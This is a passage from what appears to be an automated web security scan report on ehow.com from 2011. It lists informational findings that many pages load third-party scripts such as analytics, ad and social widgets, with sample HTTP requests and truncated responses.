</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.539. http://www.ehow.com/vacations-and-travel-planning/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/vacations-and-travel-planning/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:38 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75177

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Vacations & Travel Planning - How To Information
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.540. http://www.ehow.com/video_6598099_make-sugar-spice-scrub.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/video_6598099_make-sugar-spice-scrub.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://cdn.taboolasyndication.com/libtrc/ehow/cc_testing_01/rbox.js?video_id=6598099
http://js.revsci.net/gateway/gw.js?csid=F08747
http://media.scanscout.com/ads/ssInplayerCampaign.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://redir.adap.tv/redir/javascript/adaptvAdPlayer.js
http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js
http://ui.ehowcdn.com/content/compressed/en-US/video-CK4UfA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:12 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 83311

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How to Make a Sugar & Spice Scrub: Gorgeously Gre
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/video-CK4UfA.js"></script>

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js"></script>

<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/adaptvAdPlayer.js"></script>

<script type="text/javascript" src="http://media.scanscout.com/ads/ssInplayerCampaign.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="Taboola">
               <script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/ehow/cc_testing_01/rbox.js?video_id=6598099"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.541. http://www.ehow.com/video_6976779_sensational-snacks.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/video_6976779_sensational-snacks.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://cdn.taboolasyndication.com/libtrc/ehow/cc_testing_01/rbox.js?video_id=6976779
http://js.revsci.net/gateway/gw.js?csid=F08747
http://media.scanscout.com/ads/ssInplayerCampaign.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://redir.adap.tv/redir/javascript/adaptvAdPlayer.js
http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js
http://ui.ehowcdn.com/content/compressed/en-US/video-CK4UfA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:09 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 74604

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Sensational Snacks: Cooking With Kids! | eHow.com
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/video-CK4UfA.js"></script>

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js"></script>

<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/adaptvAdPlayer.js"></script>

<script type="text/javascript" src="http://media.scanscout.com/ads/ssInplayerCampaign.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="Taboola">
               <script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/ehow/cc_testing_01/rbox.js?video_id=6976779"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.542. http://www.ehow.com/video_7199214_onion-flatbread-recipe.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/video_7199214_onion-flatbread-recipe.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://cdn.taboolasyndication.com/libtrc/ehow/cc_testing_01/rbox.js?video_id=7199214
http://js.revsci.net/gateway/gw.js?csid=F08747
http://media.scanscout.com/ads/ssInplayerCampaign.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://redir.adap.tv/redir/javascript/adaptvAdPlayer.js
http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js
http://ui.ehowcdn.com/content/compressed/en-US/video-CK4UfA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:09 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 84752

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Onion Flatbread Recipe: Grow. Cook. Eat. | eHow.c
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/video-CK4UfA.js"></script>

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js"></script>

<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/adaptvAdPlayer.js"></script>

<script type="text/javascript" src="http://media.scanscout.com/ads/ssInplayerCampaign.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/optimost-live-gkAhVw.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="Taboola">
               <script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/ehow/cc_testing_01/rbox.js?video_id=7199214"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.543. http://www.ehow.com/videos.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/videos.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/video-CK4UfA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:31 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 80992

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>How To Videos: Instructional, DIY & How To Video
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/videos-1RNEAA.css"/>

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/video-CK4UfA.js"></script>

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/articles-legacy-TCa-WA.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.544. http://www.ehow.com/weddings-and-parties/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/weddings-and-parties/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:37 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72237

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Weddings & Parties - How To Information | eHow.co
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.545. http://www.ehow.com/weight-management-and-body-image/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/weight-management-and-body-image/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:38 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72085

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Weight Management & Body Image - How To Informati
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.546. http://www.ehow.com/winterize-a-garden/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/winterize-a-garden/

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/twitter-search-YOlODg.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:34 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 65449

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Winterize a Garden - eHow.com</title>
       <meta ch
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>


<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/topic-v2-4LSRhA.css"/>

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/twitter-search-YOlODg.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.547. http://www.ehow.com/xd_receiver.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/xd_receiver.htm

Issue detail

The response dynamically includes the following script from another domain:

http://connect.facebook.net/en_US/all.js

Request

GET /xd_receiver.htm HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Content-Length: 264
Content-Type: text/html
Content-Location: http://www.ehow.com/xd_receiver.htm
Last-Modified: Tue, 17 Aug 2010 04:48:22 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
Date: Wed, 02 Feb 2011 15:16:44 GMT
Connection: close

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<body>
<script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

18.548. https://www.ehow.com/account/simple_login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/account/simple_login.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://vs.dmtracker.com/tags/vs.js

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:45:02 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7183

<!DOCTYPE html>
<html id="www-ehow-com">
   <head>
       <title>Sign in to your eHow Account</title>
       <meta name="siteid" scheme="DMINSTR2" content="EHWC" />
       <meta name="pagetype" scheme="DMINSTR2
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
...[SNIP]...

18.549. https://www.ehow.com/account/simple_register.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/account/simple_register.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://vs.dmtracker.com/tags/vs.js

Request

Response

18.550. https://www.ehow.com/content/compressed/en-US/common-kvgh0g.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/content/compressed/en-US/common-kvgh0g.css

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

GET /content/compressed/en-US/common-kvgh0g.css HTTP/1.1
Host: www.ehow.com
Connection: keep-alive
Referer: https://www.ehow.com/forms/PasswordRetrieval.aspx
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; google-autocomplete=autocomplete; oml=direct; oms=homepage; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=101451733.743339175.1296659524.1296659524.1296659524.1; __utmc=101451733; __utmb=101451733.1.10.1296659524; rsi_segs=; _dt=ts

Response

HTTP/1.1 404 File not Found
Date: Wed, 02 Feb 2011 15:13:23 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 29091

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>eHow | How To Do Just About Everything! | How To
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.551. https://www.ehow.com/content/compressed/en-US/common-mXhI4A.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/content/compressed/en-US/common-mXhI4A.css

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 404 File not Found
Connection: close
Date: Wed, 02 Feb 2011 15:44:57 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28790

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>eHow | How To Do Just About Everything! | How To
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.552. https://www.ehow.com/forms/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/forms/

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:59 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68838

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Forms - eHow.com</title>
       <meta charset="UTF-8"
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.553. https://www.ehow.com/forms/PasswordRetrieval.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/forms/PasswordRetrieval.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

GET /forms/PasswordRetrieval.aspx HTTP/1.1
Host: www.ehow.com
Connection: keep-alive
Referer: http://www.ehow.com/account/simple_login.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; google-autocomplete=autocomplete; oml=direct; oms=homepage; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=101451733.743339175.1296659524.1296659524.1296659524.1; __utmc=101451733; __utmb=101451733.1.10.1296659524; rsi_segs=; _dt=ts

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 02 Feb 2011 15:12:17 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 24900

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title></title>
       <meta charset="UTF-8" />
       <meta htt
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.554. https://www.ehow.com/forms/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/forms/signin.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 02 Feb 2011 15:14:49 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 24227

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Sign In to eHow | eHow.com
</title>
       <meta
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.555. https://www.ehow.com/js/gasp.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ehow.com
Path:	/js/gasp.js

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

GET /js/gasp.js HTTP/1.1
Host: www.ehow.com
Connection: keep-alive
Referer: https://www.ehow.com/forms/PasswordRetrieval.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; google-autocomplete=autocomplete; oml=direct; oms=homepage; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=101451733.743339175.1296659524.1296659524.1296659524.1; __utmc=101451733; __utmb=101451733.1.10.1296659524; rsi_segs=; _dt=ts

Response

HTTP/1.1 404 File not Found
Date: Wed, 02 Feb 2011 15:12:23 GMT
Server: Microsoft-IIS/6.0
ETag:
